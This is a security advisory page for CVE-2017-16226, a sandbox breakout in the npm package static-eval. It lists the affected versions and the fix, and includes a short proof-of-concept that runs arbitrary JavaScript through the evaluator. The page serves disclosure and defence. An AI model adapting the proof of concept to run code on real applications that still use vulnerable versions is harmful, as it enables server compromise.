Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTVtanctNmpyaC1odmZx

Sandbox Breakout / Arbitrary Code Execution in static-eval

Affected versions of static-eval pass untrusted user input directly to the global function constructor, resulting in an arbitrary code execution vulnerability when user input is parsed via the package.

Proof of concept

var evaluate = require('static-eval');
var parse = require('esprima').parse;
var src = '(function(){console.log(process.pid)})()';
var ast = parse(src).body[0].expression;
var res = evaluate(ast, {});
// Will print the process id

Recommendation

Update to version 2.0.0 or later.

Permalink: https://github.com/advisories/GHSA-5mjw-6jrh-hvfq
JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTVtanctNmpyaC1odmZx
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: over 5 years ago
Updated: 8 months ago

Identifiers: GHSA-5mjw-6jrh-hvfq, CVE-2017-16226
References:

Repository: https://github.com/substack/static-eval
Blast Radius: 0.0

Affected Packages

npm:static-eval

Dependent packages: 109
Dependent repositories: 132,071
Downloads: 13,754,600 last month
Affected Version Ranges: < 2.0.0
Fixed in: 2.0.0
All affected versions: 0.0.0, 0.1.0, 0.1.1, 0.2.0, 0.2.1, 0.2.2, 0.2.3, 0.2.4, 1.0.0, 1.1.0, 1.1.1
All unaffected versions: 2.0.0, 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.5, 2.1.0, 2.1.1